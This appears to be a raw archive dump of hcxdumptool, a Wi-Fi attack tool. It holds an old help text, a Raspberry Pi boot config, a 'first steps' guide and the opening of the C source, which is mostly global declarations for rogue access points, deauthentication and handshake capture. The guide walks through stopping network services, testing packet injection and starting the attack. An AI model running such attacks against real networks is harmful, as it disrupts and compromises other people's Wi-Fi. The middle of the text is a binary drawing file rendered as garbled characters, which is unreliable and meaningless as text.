https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/2#issuecomment-369259800 $ hcxdumptool -h hcxdumptool 4.1.0 (C) 2018 ZeroBeat usage: hcxdumptool options: -i : interface (monitor mode must be eanabled) ip link set down iw dev set type monitor ip link set up -o : output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -O : ip based traffic output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -c : set scanlist (1,2,3,... / default = default scanlist) default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12 allowed channels: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 36, 40, 44, 48, 52, 56, 60, 64 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 147, 151, 155, 167 -t : stay time on channel before hopping to the next channel default = 5 seconds -T : terminate after maximal errors : default: 1000000 -D : do not transmit deauthentications or disassociations -R : do not transmit requests -A : do not respond to requests from clients -B : blacklist (do not deauthenticate clients from this hosts) format = mac_ap:mac_sta:ESSID 112233445566:aabbccddeeff:networkname (max. 32 chars) -P : enable poweroff -s : enable status messages -I : show suitable wlan interfaces and quit -h : show this help -v : show version 27.02.2018 ========== Now recommendations since we are run into heavy problems with latest drivers and operating systems * Operatingsystem: archlinux (strict), Kernel >= 4.14 (strict) * Raspberry Pi A, B, A+, B+ (Recommended: A+ = very low power consumption or B+), but notebooks and desktops could work, too. * GPIO hardware mod recommended Supported adapters (strict) * USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter * USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter * USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter 25.02.2018 ========== - initial start of this repository - added hcxdumptool - added hcxpioff hcxdumptool-6.2.5/docs/000077500000000000000000000000001415170014400150175ustar00rootroot00000000000000hcxdumptool-6.2.5/docs/config.txt000066400000000000000000000005561415170014400170330ustar00rootroot00000000000000# See /boot/overlays/README for all available options gpu_mem=64 initramfs initramfs-linux.img followkernel max_usb_current=1 hdmi_blanking=1 dtoverlay=pi3-disable-bt dtoverlay=pi3-disable-wifi dtparam=audio=off dtparam=watchdog=on disable_splash=1 tparam=pwr_led_trigger=none dtparam=pwr_led_activelow=off dtparam=act_led_trigger=none dtparam=act_led_activelow=on hcxdumptool-6.2.5/docs/first_steps.txt000066400000000000000000000045051415170014400201310ustar00rootroot00000000000000Identify interface and processes that interferes with hcxdumptool: $ hcxdumptool -I wlan interfaces: MAC_INTERFACE (used_driver) On a warning like this, stop services: warning: NetworkManager is running with pid 415 warning: wpa_supplicant is running with pid 515 stop this processes: $ sudo systemctl stop NetworkManager.service $ sudo systemctl stop wpa_supplicant.service Check driver $ sudo hcxdumptool -i --check_driver starting driver test... driver tests passed - all required ioctl() system calls are supported by driver restoring old driver settings Check that packet injection is working (run it at least 13 * 5 seconds): $ sudo hcxdumptool -i --do_rcascan INFO: cha=6, rx=351, rx(dropped)=0, tx=47, err=0, aps=21 (13 in range) if the values increase and APs are in range, start the attack: $ hcxdumptool -i -o test.pcapng --enable_status=1 otherwise hcxdumptool will inform you that packet injection is not working as expected. If attack finished and hcxdumptool terminated, restart services $ sudo systemctl start NetworkManager.service $ sudo systemctl start wpa_supplicant.service If hcxdumptool is not able to set monitor mode for example on this driver: https://github.com/aircrack-ng/rtl8188eus run ip link and iw first - than run hcxdumptool: $ sudo ip link set down $ sudo iw dev set type monitor $ sudo ip link set up $ sudo iw dev info Most (nearly all) occurring issues are related to the driver (driver doesn't support monitor mode and full packet injection) and the system configuration (running services that take access to the interface). The driver of the device must support both: monitor mode and full packet injection! Otherwise hcxdumptool will fail! Some of the issues are fixed: https://bugzilla.kernel.org/show_bug.cgi?id=202241 https://bugzilla.kernel.org/show_bug.cgi?id=202243 https://github.com/openwrt/mt76/issues/2...-500999516 Some of them are partly fixed (or somebody is working on them): https://github.com/aircrack-ng/rtl8812au/issues/376 Some of them are not fixed, yet: https://bugzilla.kernel.org/show_bug.cgi?id=202541 Unfortunately many, many drivers do not support monitor mode and full packet injection. Get more information here: https://wikidevi.com/wiki/Main_Page hcxdumptool-6.2.5/docs/gpiowait.odg000066400000000000000000000344511415170014400173440ustar00rootroot00000000000000PK}D%SŸ.Ä++mimetypeapplication/vnd.oasis.opendocument.graphicsPK}D%SConfigurations2/floater/PK}D%SConfigurations2/menubar/PK}D%SConfigurations2/popupmenu/PK}D%SConfigurations2/toolbar/PK}D%SConfigurations2/toolpanel/PK}D%SConfigurations2/accelerator/PK}D%SConfigurations2/progressbar/PK}D%SConfigurations2/images/Bitmaps/PK}D%SConfigurations2/statusbar/PK}D%S styles.xmlå\Ír#·¾ç)Xt%·ÑðW™Õºì8»IÕjò®9¹À„La0¢´/‘c^Æ7¿Iž$¿!† AŠ’E®²Mt㧿þÐhòÍ·÷+ڹü ,»éö/zÝΖ’lqÓýùó»èºûíÛ?¼aó9Ið4eI¹Â™ˆ ñ@qÑÎY1ÕDÆØMw)D>c–ãL·^0¾ˆ½Þ$ÖŸ»¦ÊÈê¦[òlÊPAŠi†V¸˜Šd*»Úi¦^$`Sµ>ÝX¬ @òF [å0ÊŒbw˜œãÕð¡Ã¹}ܱ’¢Š ƒõz}±*ù?ÿKZ$ð½ˆ-7ÏE ^ã˜ãœqa¹Ó¤bÎKN[šÄ˜b¹°"î_ô«‘“%â"TÅ\önŒëÝÂkÊÑ:tÉ ææv—@…v—¼n_°Ã¤ØQœ šTÂJ;W2oMµnj͉Àܲ¯°@¡sI^wª{J²/M¶ÕŸL&±¢ZÖ9 ä¾ ÑœyTØîÏ£-ÖŸB'6á¤f0Ã4Ü`†iÍZÐ,\‰ŠÙí•«æÁs#ví`.8ôTŽ –¸±t¾¨â뜕Yªã‹ ßç˜IBTu›ÖFØAc_0VL®³¶vè÷bÉcùé%~W <ÿý7Já©ÚÍyŽ ñª N€p  vÁoæêÏ ¼T„DýÕúÈ(™D€Ðý^ïN§f X‰œ}ØKñÂ4ÍOåî ÒïF‡«]©aÞuý¶ŸœÍ,܈ Ê6Ô]1tŽ‘údÐòF‡È÷7Œd¸MBÃrN2’QR« þ\Òý߸K¯Õ]zgcJ“ËcÝÅ#aå.ç#ãÕà(wñ©P¹ËóH¶â÷õ©ݳ÷l¦†!|>³‹[0ŒŸ–(ÇÅáz}àÙhçxfKT\ôm[T«X Z#÷Âjo˜3FÓp4ÞÁ*°÷ Û†A1Ìè$w+ \¼ôâïié9¦kžŽË.¥A'DʪÂÂ6½n×mågTÚè`ÞsŒ³Vdj/®¯{,6g ŽPÔO/lTÓOÇxéé”$«_À|ÿ‰)Un~`ê,/bÀ²0öÙÀùQ§fŸ.fï¯Kºè]÷=µIOËñÚ£ºå:2®WXÛ¨K¶CTm«»O¢ê=¼ãÈP~$¦ 9 [û|24¼Ñ²Ââ¨xy$¦Ê9 [}2$Ú"dƱ12À„ ©ûÁÈ~EàQ}€u?Ã)ß/ð£#¡ªí6IhOT,—.©hŸœnùhUn~Há)ÎÒÆ~žzÓbÉÖQ™aÃGëT,}ÑAãUç85bÖ2R˜å˜‡dJú\ÜÁÏ-Û{²»jWí5ÉúíÓk"CýB~(šú½ö)á4Âw¤ *7ñ$UÄÁ’‹–Wóy{’«œ±ôá%WêÝ†Ü ËAiS+•¬fŸ“c"Ì©¥óÕ¹è¯ÑÔkïS×®œ¯óÔkql…S 2×ÿò(œò¹L‰Ô ™¼é鞎ƒÏsýHïbOó²§Ô1xòÊŠÍí~ó™­'‚$™LÎK!N®gٮٻè{ªö*Bƒ~+ÜÓJ´™,1JéQûgŽ¯ÍÑÀç ŽÑaŽa1z‘Põr Õ {÷±Ð=QX9[èF 5žD€“'Et…QQòçð×ÀœÃs_ÝÝzïòA:j|Ç·~›Ä|”ß—¿á—D–`q^à.þ¬5-ýã¶×mài1=Ï6±Õ¬7 ~ãd[Õ|¸Aÿb óˆÙãÅkB(ƒJ‚Ñæ$[wôm»/"®@ÿûõûþ.L<:FQziå<+äÖó0#yÙP~Kœí󘓾Æ!S¶ÐZïù;//—Œ’çv»8wn·‚Ô rïné(Œ–ÖTŸ%ÃRvFÛ祵æp¬©û^ì·Æ–q¸Ø\F<uwPÔ]ÑÄiÈ“°ô–Êb´ƒ‹£ô{q~³Þ.¿— ¹/buC!<ŒY泪OK×57H,O ²Å»YDNÜçN÷ÉM˜/–M‘gš›å†S>Ø*ÍÄ.Óóm{Ù}T:ƒKŒm=aâc7NÔ/Öƒ ÀÐMC“Pºyo„AøI"„PÂá-C¹6ã0–!8Q“b ߌ{ˆßÁqün‹Ø+w‚:tôkÚÉ/×ïûw›¥Ù1¾±~e‹°¢Æ,¶A½ê^)µÿzS´zÛÌkªQ ½mØÐùºñüP B?.Þ¾©Ê¡mVªÏLÓ«ÕûˆÖÏ åƒ—RYô–ÑÒ‰ÇÃÕê×^FŠßŒèªÆ•2šÑ«Û0¥á¥Ÿ“ÄKYTú44·^ñìÖ—«F‡Ü,Ò>‰r{? <î å›4¢³ÎP¬ß”vŠÅCQ†É):^{éÖ‹gÔj;Sú—¤$‡sª¥xŠ€}í퉉.mÇ©ÎÐEõW·{û’°¥€¯òqÚÂä×®AZaµ–õLͼmÏÔ)ë6Ÿ°ns/ÛE~Óœy9[ñjÅÄæ½—«fÜšEÍ((‡y…÷[QæäûNGbBïÇŸüßJaºQÐŽéô>%iX7°iå©;’G?÷ªG[Š_ßí‹2Ú<Œ o™(¿#K"ºÈh†cÞS·9¹Swa´ÝQÐÝxqA{7dDiÛjhÀ0ý¤m¿‹v?0h‹QÏo‡œljܒʋ¯¤ýÊZÒ ÿwÜãq¸)…Ž,óýÔ˵ߪ¾‘fB4ãc aTù¹õ’ǽ0H$ÞÅ&Þ,Ÿ †T½\-odâƒ1>ÇòQBMó—^‹:½ñ/Û‰@³ñÉ>´ä}Hn¾ ýò.*wd_2g-±ÇN¯$ûÈj`¶ÐžK|ÄÇÐl§ñ¡+AŸ&>î%>âƒ4Œ­i|ͲŸ(>À¸H¾€†ÀSè‘ÖUÏ$@Êff)@ö…ç²bû¨›ÍÃözÌ%Û§ Ái¦c=Q€i±úL$˜b»šaºO ¯&÷ŸVõ~µ_³`avXOjshãA?dû2:N@ø£tÇ|¹&´ékòˆ˜Ñr¹‰—oib±´­Ö÷½Æ¼ž [K’MÚnHY²½º¦9ŽÒ°» Æ«ÖÆ( ¨y‚g |×>ŽŠºà‡›`Õ'ˆÃÛ0®qáfÇa©T¬ ]U«.•g¸Zýøßÿ´é Òóça•{7´§½c àÛ1tãàáþ ’Òîvì‹Ž•´Ü9eamÍóÆ"úšiâ/¸_Y*áx‚ŠŒí'Ü„’‡žŸ‡ÐÙ<4ø,=džÑCγô>›‡ f>KYgóz–þ±ÏçŸgŠÓÎÙSœvÏè¡ç‰Óìç™\„?- îu×sm]xB¤î¸!ÁCû¡> òö _&±!Õ‚©š›³Ï`Õ¬º»¥:?SÂ[¯ k~’¤îûÐ-ã9…¿/¨"j±ó²p:?bÒ.¾Ï¾jzbïÙ¤?Ⱦ¬üm<øsBÖÒ=Üm›îÙCwl€æ3Dâ urez­e˜îØqí@݆$ Ëüs°Cç¿#tC1,£¾ÖŠmã}¨f$JË‚å c02,T] ¥jã€c"»n¨Fª[øµná½U cê{†=— RºÑ{ì ÝCFÝÆq”Í·µ+ã'¿idL®TMËPþ¡|É“n¹ŸG0MËíÓÔºÄò“Œ¥«9&¼ó ¦mëò²?M,ï“xW«(°j²á§ €.Eûs ô¢i\ªö¹j¦Æ¥y™ýÔ  ÏhdƒqÙ^0ø-[¤Ù—²}FÑ´.µùs‰fÂ`Âç4ÖŒê{Aý²5/þ4ËÖÔ\ŽËöÂÍMNc3F( ã’™‘ƒÑ8€.¦5,Ë };©7侉ê[P?=ÏÚصè#½3­IZ’¦¡_’|ÎT$4‰M½Üˆ;l=p©h`Eºikq4«rO­‹——ULúW5w É°!(0^Lå*QY·*ĶµSM@3l¼šæ¹ Ó°_"úÐ+ KÛ\†áx€áøhº€iÍ;ƒGÉýY°µÇ-÷aõ˜ª–™~·ÁPi.ˆ_\ìÓf†Ñ& sÊ„Ív¬QI_·*¼§c™ô¿SÿtY9+×ô7`° à€ÉL.`DwT»Ø¸ô/-düq*ÈF€˜]/´;*Æ]N…Ø° ãE¨¥BŒኊ@^/ê´7¿Yio²L¦½ÉxÍN{“ñ›•ö&wÓ3^\i??ÚlV—úšìø×¾zMÿTåì¦=tJòd{W«Ï e¥âcžêQ>8#I…6M€ƒlhÌF ¼ÂÔXÝ6!>ÌlN™‘òšÂÆ¡xÌ ñq­©<¬¼‚.QÖž2[TYpDWgª+M„×ï6öeÝYFõ8#˜$Í Ÿ/LüêEéÀ1^¾|õÂPùp/_Q:êªäTÝ/_W€rXà$çÔÓa›!Õ©2ò'Ù:c"Ã#±• ±¤DN2}ÎÈžÌ;¥eN ä#ÌtåDNjëcÌ””9©Kn¦kvØ%Ÿ>“Z®Œœ—¨N•‘—8Ç‘÷J&Ï@æŒGò4™pzäÌ”K(93%eÎÃ@bˆõI'À@¦:£¼Ìyø ;ç¤[2…$–:g«´Ôy’5U20$kª¤Ôy(¢£‰“×9 ý Š2Õ}¤e¢y( ;‰è¸[.ŒÄRçl•–*€#ISåÒ‰IÒTI©ó¡yG}ò‰$$LuFy™óp4vÑI·d àH,uÎVi©óp$kªd IÖT9©æ<$ÑE¶8yíÓPÐ’@¦:£¼Ìy8 ;‰è¸[.L‰¥ÎÙ*-UG’¦J¦‘$M•”:Iˆ‘wÔ'ŸH@ÈTgô‘—9G£aÇtK¦‘ŽÄRçl••ŠçáHÖT¹4Â@’5URê’çEì§ð9Št"á ÍÝ×F2O7à UCôŸŒî¼4ˆë­“êw5#ET½¦ÿóáBÝŸ{é6TïÕ$J£dŸ\­øsáyï¾"ád»m½ÉÞÇ »· þÙâi|1ü$µ± {[<®Ö?Ý\íl1ª˜<ôKêÄX°‰zÍ·}Þ×ìÃMŸîçé[ã ‹Î=°¹Ì¹ ÚY} ï&Qž“¼÷ Žö]†ýîæ%€ÃΧÌãìÿBÍé"ü8và`ÿi&îoÿÂú+êµ"ƒÍ_8hîoþ‚n³0èèQ¯±O {[Ū¨@“ªµÃ¶{«"äÀ™Mbì íB v‰Å—®æâ'6ñ£5ò£]±ÌyÒz²ç×Å,‰ aÜbÓÙ! Œ[61š8‡ö»Öc:§«{Pÿö‘ähë»sœ98¤P@à/šõzÎèe2©ë€Ë\§bÃÞ9ì$Âœë+àãžcï+™sšu4zÆìáàfÛã“#·ŒŽÔë­bOšúãºÚðüˆ]Ù!—ö³øøaj¤4À†±S-lÌÄÙÂ@¡ýà©ñ£ ‘Z|Þñ›!èNŒþÝ „‰Ð~¦.'ƒå éXB7›sn¶nî Jò=ðV5-î f.Ÿ+)ÚÓ¢·„£¾ï²…~þÈã]PCŽÙŸu°÷±£á¼Ã¨Kw’ûG¼Ðäˆ×´Å9ô%4Þ9Áx aÇÆšk¦\£ ­}èl›ñýYÌrO0ËÕ€=1‹Nf€Ý3 kôØ·‹ÎÌC§öÞÿñÊ‹˜Ü©þ>gï{9 (]LÝyy ü¾"XÓäV’ß*ºxq•.øÌoÿPKÜ9ºwÃyPK}D%S settings.xmlÝZ[sÚ8~ß_Ñaº3»³“b“d·fvÌC/ÙXE–<’¡¿~ iS„Úxggó@@–¾ïèèøÜì¯=úf……$œÝÔwJá f6w[ÜÆfóê}áïÊ/ø|Nl\v¸z˜WL‘o`9“åíeÎù]Á ¿\,r³íè;.Å’¢hÅíïÂn bÄ»+„‚•9’D–ò°,v9^úDTþ> b9‘p;(=Bψç^ÙÜóÅ¢ø9Œ/°„‰ ü¹pÏ×<Dz9›“Ź(ÛÙÏׯ)aËo:Œ¢è]tèOÕ4­˜\}šzZÙ7{ÊÞþ:W°Ýi'‚í¾?3‘ëBåɞ̠òa·—í¿+`/¶‘7»á˜ì®"—WG߬§phÝk&DƦ ŒLîž..*W7×ʇâKœŸÂîâyp\½-Ýü•þ8{ÿ¶ô—ú>3|“…{Pþ’¦*7çâ_yÈ¿"ÌÁkììsáèði%kÀrÄæ‰qÔqöÄ”S(TbÃPÓi¢%ˆÓ‘;}ìÁ[œSŒX¡2GTâ,øMÁÙ¾Ž/Þ‘#†|“Ç,9ÂÐ÷X&±"ÌHv ÃG).°‘{ë ¶ƒ¦€ÁÜYî¢|63 ¡l#æP,u¡MŽöÛ.|© ´Á½FOz hPâ†<àt“¨­ ÓrLê­’ÒkwäK®<Žhw]´Ð·$þó¦ BˆM¡ÒŽîîÒq À÷(o–.·—Øy¢ø:TŸë8l+…÷ySþRÄìÆi„‹W#DzüØ·~‚À¹Ú\.ÀÔSÚùSð@؉Á/ Ü‘‰)ô¸“ƒ*:²ÎCPr{iâuÐpÈѨ™…&!¨¹ˆ-°Á·™øåiF”8X°0xtø ÎN®öÜ%håÀ$®1{6ûÍ”µœ3åÛôùa#!ñQéU%m¸û~\ölèMHØN ž ù¤Ôé¡ã,-zÚ‡ÊU €‹Ëkæ;I ì$ç8Fs’Çc'9í¤#“T/æi°8£É£–‰ÑsÈ(gœ{÷ì@œ½@Ñ™ ;q(¼_a1§<êâ²7?Ïu`ðyù}ìò®¢?k}¿%C,7ß·Hw2mØù9d7mÆø –xÍAÈì µ—>u`l\o¨=sÂÔ]ïé«èÛÒ†®»£ø¿#O#F«©<ŽôuU7èáV™M;Ú¨YKš´®?ÎÍVóëlúñÓlj̇ª¾î› ÕZø+Û£Ôb†ë´èÊú¢a®b{MßÑý/ÖuÕŸM{ZoßKkù85èàaæZí>­yªk{ŽoyÍ%b“¯NKœ¡Ö«EQ·®Ëžž¬|ƒÚmƒÌŽ²}µZ“Òì!Òàz4kÍ–³éÌ,Ÿ8’ùŽG¿ÌL%ªÑêÐhÀY2ƒâ¶Ñ~ÆÜYib¢©Oï— %Þ¾ÞèÌIµ:ijɤÚ3&îÜk cø^7Ú“8oÌm93ùŸfiæ¥lî¡6]pu šÃ£€Ÿl_bºg5Êe±odC{­Ãšút‡8ðØw ß‹Œ‰=ŸžÈý~®3™t‹/^+{•°òPK9Q)ÈŒ(PK}D%SÅ[úãÛ Û Thumbnails/thumbnail.png‰PNG  IHDRÆ߃ùr®PLTE ###444<<¥äôÂ1rKÑx·F)MÑÜò¹ˆ“M*ºàjÌy[~£²äÜl‰h¯9S³ Õ»ê)L¼¥8KÆкÙM)Ù Ê G¸˜ÎŠ·kq±™Â½ˆ±§ùZKjS‹5ËŠcƒš)ŒÀÂ!H³TŒ7oÝùoÎxííYxkßž‡ Š£à| å쬟ÃÌëÈ­Ô%b@picpq6¸^&åÌE5PUÑ m„ 1„ž\¯f©ª åVƨ¤$7| Ü…‚uœ¼Z[£L–ª ŠKir]|Z®ÁÕiáåÒÉZªZvÖÚNcŒŒ Œ10ÆÀc` Œ10ÆÀ8 ŒF½pç½¹;îãã]ñz˜›ϼ1à;ŠZQÌ÷“Áfkrv®ØCóÑ% ÒÛ²dŒþV[”=Ùî²q.(§[U-+ÔSŸúÚMS—P‹Y´4xJv“º)ÖŠ6Ò… ZQUKª™Z¢_fÉEB‘Z7©цj]1¤"ª±ž´¦GjTÝ%ïã‰X*xAíq1îc?æò<Œ$È’bk½u¬Ø¶@Ú¢´F¤µÖ+Wç´m­¶™”P© ¥J,Ò›BêÍé†3†¨„1y2es[›ècŠ ÄHµÛCêÖ oܨ Î÷ñ©“+8kL´ 7ª Ycôɨø­%k8QKuò·”}Ë·ó«ëô¸aj YZµÙï¤n“’e’ À+²° VFG½F²aMiR:Œˆ (È 8“¹¥• •_˜JÝtÕÒñ0t£«lúÜPw5˜µKœhH±Ê$5çîy;ÑF²Ñî:#ð¬m¼‹b/êVÇkTÞ“ËVvyíc@Z‘¹ÒILþŠ4My Éqv4Å…Sš( $ŽÌ£)ÖVï­I}D݈¹’o«9ù+טsÏÕ ŽüJ/´¹¥œRˆ$, B ï–iCÏ{ñ®åè=dnbGUqŒ÷U÷îÈùóÓ2¸tMçÎ9æ}}¡a¡®wp=ÄhÉu{ǹóÉaê1¤’kÉgÅ#;dÊH(ŽêêÛ²8 ït„dÖ¸ÎrPœ &3™(µnë6y55a ¢U¢àÑÑîzyÉx˶RRå8[G+YZEž`Jóxa™m+±ÌÝ× ¸À¥a„ìªÖôŸ†æ|’äè¨ýè¬ …ˆ¦ ªCt¤ñÀw@›M诙É7bªÓÇðwüAnw íi`¸¤©÷ ¤ kÒ`#mœd¦>'?»zB›™rÜkå(æòDZëz2*‰¬#¯È-äÉ“(òáG4¸ðC`pðä1Š Ô!,'Ža ëI°ö·Ë+úyq'†»í}e.öߊAÝkv*aÇ—žwoj챚d,—6'Œ^¬J°l>D£ŠÒ'¶¦ëóó0pÝØ%é˜!Iì ÝTt²RD=¡<F¨ôÇÚ¶KþéãóN"‘£ôšÆÍP½¬¦ÍÙ‡1¸ÿÜ—>}§4¶Z€+ÑÞX×,vm\ÔªjÈ ‹éæ@׊ýùÏï9.û¥VKp70¾CÍ¿ÌJ/#¼ô&Î0®ÛÓò1>|øóÎχËËË«««ßÜ®=}Z>ÆÕÇOŸï,WWŸ>~þÒÿzàÐåbüuoÏwüÊ—«ã$¤ñå4¥‘û_B~#‡_Þ…¼xiÌña@ÎPz#îwZ´4æ+|ß› ߊ±`iP”aN_O4ª÷'$ø¸ŠŸ”4ÇxRºá¡=-È™¯ Ææ9 2§Œ·^ø¦ô±0B6OK#jêµ*YÜ]i ·\ïQtŒtꆫv,ŒºÍ{T¨ùIpbº/²I&á™ÊÉÔªª£Y*WôÓÒ kM ïéK wƒSoóYò*M7‚ùŠnÈÙ`¤âi4ÎoÊ&ç¶9‹–ê¥ø|¿±9ïöpË0¤ß,_oCHÕÈÀz­¡%L©¬9¶šäá1ªAõÌÐ0(Ãw°ÈÜ–¨¼… ‹]g)ÒtxŒbºz¦nxÍÖ‹0Î~Þæh¡˜ÍÓ`ìø6¦R*=S(e¡ú¤4ÄP?'Êj:Ÿ9,F|ÿ>óô)jNûŨTß&=ǃbÜZ5üði¤Uö¶ò4#Ìèn·/ ãD,Õ 1p6~\À< ¯m*°Õca|¯Š[Ñàä4@¿pS2IÒÆž.Zqër":)žë(:ºS vçÇ€78iÃ&8=¬på2™ªÚ9é]·ûOB],†¹fÅAY’8L®¦*ž0•Vpï¹ì –Æ2-ÕÀãt0ê£Ùü÷º|3±î?Ü;zƸy¦£ú¢)ï;g>§]©¼ëw7ŸcÚbT*ïÎTB~W€ató|³aÏî’ùÛ\¶UçoÓÙ“äz]æ:ÆàòÕoßѾ*æH‘™¼y!ôx¸¹Ô&Ü)·»H[ŒxcDˆßE¾®48:ƒ5ÿ1¼þÞ^Zà§ÝowçnÏV;x[ØjoóÛFuóL;i¼rv[3|Ö›1¦Ç2 J¸Î<È!ìÛz aÍÅÚNÅCØÑQcÜœµŠöªÒHËßù³g†z›c©^ãÕ nëX^ãYA¾ß6åàÕ1¤5¯Šü°9;°G35RåQ¸©Êa‡ÑÂõ™êî› ‚{U EݯÃa·X*Ûqç½Ðõ]š7°žw×Kn{“tK®]Ÿ‰ 1LøªÍVÇ·Àæ§é„þû{ÐÍÝr˜›ò»ËËßÿõsË×rÞ•Ë+±Tó„÷‡ÿoÝÍ4»yéþÆáNyû˜¿+ÂRí fÿ°‹BŸb¼÷“y)Ü»E ÷nñæ™b|AZñ³üÆß–Øðáp¾Þ<´®/™r7f(Œ10ÆÀc` Œ10ÆÀc` Œ10Ær—ÿÏG:Á1çAIEND®B`‚PK}D%Smeta.xml“ÁŽ›0†ï} D÷jlcH±EX©‡ž¶j¥¦Ro±½Ô-ØÈ6›ôí Òì&ªrƒñÿÍx~Ï”§®^¤uÊèmŒGRs#”n¶ñ÷Ý'PÄÕ»Ò #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __ANDROID__ #include #include "include/android-ifaddrs/ifaddrs.h" #include "include/android-ifaddrs/ifaddrs.c" #else #include #endif #include #include #include #include #include #include #include #include #include #include #include #include #include "include/hcxdumptool.h" #include "include/rpigpio.h" #include "include/wireless-lite.h" #include "include/byteops.c" #include "include/ieee80211.c" #include "include/pcap.c" #include "include/strings.c" #include "include/hashops.c" /*===========================================================================*/ /* global var */ static char *interfacename; static char *pcapngoutname; static char *gpsname; static char *filteraplistname; static char *filterclientlistname; static char *bpfcname; static char *extaplistname; static char *extapwpaentlistname; static char *eapservercertname; static char *eapserverkeyname; static int opensslversionmajor; static int opensslversionminor; static SSL_CTX *tlsctx; static eaptlsctx_t *eaptlsctx; static fscanlist_t *ptrfscanlist; static int fd_socket; static int fd_gps; static int fd_pcapng; static int fd_socket_mccli; static int fd_devnull; static char *mcip; static struct ip_mreq mcmreq; static int fd_socket_mcsrv; static struct sockaddr_in mcsrvaddress; static struct sockaddr_in srvaddress; static int fd_socket_srv; static int interfacetxpwr; static FILE *fh_nmea; static struct ifreq ifr_old; static struct iwreq iwr_old; static bool forceinterfaceflag; static bool targetscanflag; static bool totflag; static bool poweroffflag; static bool rebootflag; static bool wantstopflag; static bool reloadfilesflag; static bool beaconactiveflag; static bool beaconfloodflag; static bool gpsdflag; static bool infinityflag; static bool wpaentflag; static bool eapreqflag; static bool eapreqfollownakflag; static bool eaptunflag; static bool packetsentflag; static int sl; static int errorcount; static int maxerrorcount; static int radiotaperrorcount; static int gpserrorcount; static int pmkidcount; static int pmkidroguecount; static int eapolmp12count; static int eapolmp12roguecount; static int eapolmp23count; static int eapolmp34count; static int eapolmp34zeroedcount; static int owm1m2roguemax; static int gpscount; static int rcaorder; static unsigned int injectionhit; static unsigned int responsehit; static unsigned int injectioncount; static unsigned int injectionratio; static int gpiostatusled; static int gpiobutton; static int gpiostatusledflashinterval; static struct timespec sleepled; static struct timespec sleepled2; static struct timeval tv; static time_t tvlast_sec; static struct timeval tvold; static struct timeval tvtot; static struct timeval tvpacketsent; static uint32_t staytime; static uint16_t reasoncode; static uint32_t attackcount; static uint32_t attackstopcount; static uint32_t attackresumecount; static uint64_t timestamp; static uint64_t timestampstart; static uint64_t mytime; static rth_t *rth; static uint64_t incomingcount; static uint64_t outgoingcount; static uint32_t packetlenown; static uint8_t *packetoutptr; static uint8_t *packetptr; static int packetlen; static uint8_t *ieee82011ptr; static uint32_t ieee82011len; static uint8_t *llcptr; static llc_t *llc; static uint8_t *mpduptr; static mpdu_t *mpdu; static bool qosflag; static int nmeatemplen; static int nmealen; static mac_t *macfrx; static uint8_t *payloadptr; static uint32_t payloadlen; static int packetsentlen; static uint8_t packetsenttries; static maclist_t *filteraplist; static maclist_t *filterclientlist; static macessidlist_t *aplist; static macessidlist_t *rglist; static macessidlist_t *rgbeaconptr; static macessidlist_t *rgbeaconlist; static macessidlist_t *rgbeaconlistptr; static ownlist_t *ownlist; static pmklist_t *pmklist; static pagidlist_t *pagidlist; static scanlist_t *scanlist; static eapreqlist_t *eapreqlist; static int scanlistmax; static int filteraplistentries; static int filterclientlistentries; static int filtermode; static uint8_t fimacapsize; static uint8_t fimacclientsize; static int myreactivebeaconsequence; static int eapreqentries; static struct sock_fprog bpf; static int aktchannel; static uint16_t myapsequence; static uint16_t myclientsequence; static uint16_t mydeauthenticationsequence; static uint16_t mydisassociationsequence; static uint16_t beaconextlistlen; static uint64_t eapoltimeoutvalue; static uint64_t eapoleaptimeoutvalue; static uint32_t statusout; static uint32_t attackstatus; static uint32_t pcapngframesout; static enhanced_packet_block_t *epbhdr; static enhanced_packet_block_t *epbhdrown; static uint8_t weakcandidatelen; static uint8_t hdradiotap[] = { 0x00, 0x00, /* radiotap version and padding */ 0x0c, 0x00, /* radiotap header length */ 0x06, 0x80, 0x00, 0x00, /* bitmap */ 0x00, /* all cleared */ 0x02, /* rate */ 0x18, 0x00 /* tx flags */ }; #define HDRRT_SIZE sizeof(hdradiotap) const char *channelscanlist1 = "1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13"; const char *channelscanlist2 = "1,2,3,4,5,6,7,8,9,10,11,12,13"; const char *channelscanlist3 = "36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165"; const char *channelscanlist4 = "1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165"; static fscanlist_t fscanlist[FSCANLIST_MAX +1]; static uint8_t myessid[] = { "home" }; static const char weakcandidatedefault[] = { "12345678" }; static char interfaceprotocol[IFNAMSIZ]; static char rssi; static uint32_t myoui_client; static uint32_t myoui_ap; static uint32_t mynic_ap; static char drivername[34]; static char driverversion[34]; static char driverfwversion[ETHTOOL_FWVERS_LEN +2]; static uint8_t mac_orig[6]; static uint8_t mac_virt[6]; static uint8_t mac_myclient[6]; static uint8_t mac_myprclient[6]; static uint8_t mac_myaphidden[6]; static uint8_t mac_myapopen[6]; static uint8_t mac_myap[6]; static uint64_t myrc; static uint8_t myanonce[32]; static uint8_t mysnonce[32]; static char weakcandidate[64]; static uint8_t epb[PCAPNG_MAXSNAPLEN *2]; static uint8_t epbown[PCAPNG_MAXSNAPLEN *2]; static uint8_t packetsent[PCAPNG_MAXSNAPLEN *2]; static uint64_t lasttimestamp; static uint8_t lastclient[6]; static uint8_t lastap[6]; static uint64_t lastrc; static uint8_t lastkeyinfo; static uint8_t lastkeyver; static uint8_t lastanonce[32]; static uint8_t lastsnonce[32]; static uint64_t lastauthtimestamp; static uint8_t lastauthclient[6]; static uint8_t lastauthap[6]; static uint8_t 